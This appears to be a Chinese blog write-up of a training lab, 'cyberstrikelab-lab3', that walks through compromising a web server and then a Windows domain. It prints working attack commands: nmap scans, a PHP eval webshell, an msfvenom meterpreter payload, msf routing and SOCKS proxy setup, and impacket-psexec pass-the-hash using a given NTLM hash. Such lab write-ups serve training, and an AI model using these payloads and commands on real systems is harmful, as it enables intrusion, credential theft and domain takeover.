【域渗透】cyberstrikelab-lab3

cyberstrikelab-lab3

web信息收集

端口扫描

nmap -sT -Pn -p- 192.168.10.10 -T4

image-20251206220152394

3590端口开启是一个web应用

image-20251206220216645

扫描出来了一个

image-20251208122357059

访问看看是一个登录框

image-20251208122447643

查看登录界面的网页源码

image-20251206220503407

登录进来看到版本信息

image-20251208122604065

使用万能的搜索引擎

image-20251208122909691

看到这里有一个本地文件泄露漏洞

image-20251208122851861

找到第一个flag

image-20251208122920024

另外还发现能在web目录写入文件,我们写入一句话

<?php @eval($_POST['cmd']);?>

image-20251208123325873

蚁剑连接

image-20251208123414568

msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe

image-20251208123821870

内网渗透

上线msf

image-20251208130100706

直接就是系统权限

image-20251208151527690

查找fscan

find / -name "fscan.exe" 2>/dev/null

image-20251208152602786

利用meterpreter模块上传

upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe

image-20251208152504856

看到有双网卡

image-20251208152752943

fscan扫描另一张网卡,发现192.168.20.20和192.168.20.30靶机,其中30是域控主机

image-20251208152737464

使用fscan扫描第一台机器的端口

image-20251208191057905

添加路由

run post/multi/manage/autoroute

配置代理

use auxiliary/server/socks_proxy
set VERSION 5
set SRVPORT 1080
run -j

image-20251208182310504

修改代理

vi /etc/proxychains4.conf 

image-20251208182509354

访问到thinkphp站

image-20251208182532571

从flag中可以看到木马在主页

image-20251208191127973

使用awBruter密码爆破工具,爆破出来密码是admin123

image-20251208200123616

蚁剑设置好代理

image-20251208191409050

使用密码连接

image-20251208191251707

找到第二个flag

image-20251208191458332

拿下系统权限

image-20251208191638704

域渗透

之后就可以上传msf马,如果蚁剑不行的话(这个环境可能有一点问题,第二台机器老是断网)那就使用windows的远程连接上传到10.10,然后再利用windows自带的远程连接传20.20机器(前提是创建了一个远程连接用户),往期很多文章都写过,之后利用msf抓取hash或者使用猕猴桃抓取哈希,使用hash传递攻击

proxychains impacket-psexec -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/administrator@192.168.20.30

image-20251208192612665

本站小部分内容转载于互联网,如有侵权还请联系
THE END
喜欢就关注一下咱们公众号吧
点赞40 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片快捷回复

    暂无评论内容